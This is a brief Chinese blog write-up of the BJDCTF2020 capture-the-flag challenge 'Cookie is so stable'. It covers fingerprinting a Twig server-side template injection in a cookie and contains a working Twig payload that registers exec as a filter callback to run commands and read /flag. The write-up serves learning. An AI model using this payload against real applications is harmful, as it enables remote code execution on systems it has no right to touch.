[BJDCTF2020]Cookie is so stable

打开题目环境,一开始考虑是sql注入,但是发现输入什么都会回显输入的数据。

这时候考虑是不是模板注入了。根据hint,注入点存在于cookie中。

{{7*'7'}} 回显7777777 ==> Jinja2
{{7*'7'}} 回显49 ==> Twig 

将cookie中的UM_distinctid去掉,添加payload

 

根据回显结果判断是twig模板引擎,打上payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

拿到flag

 

第一次做到ssti注入的题目,对于paylaod的理解还是很模糊。

 

posted @ 2021-11-02 12:38  C10ud  阅读(66)  评论(0编辑  收藏  举报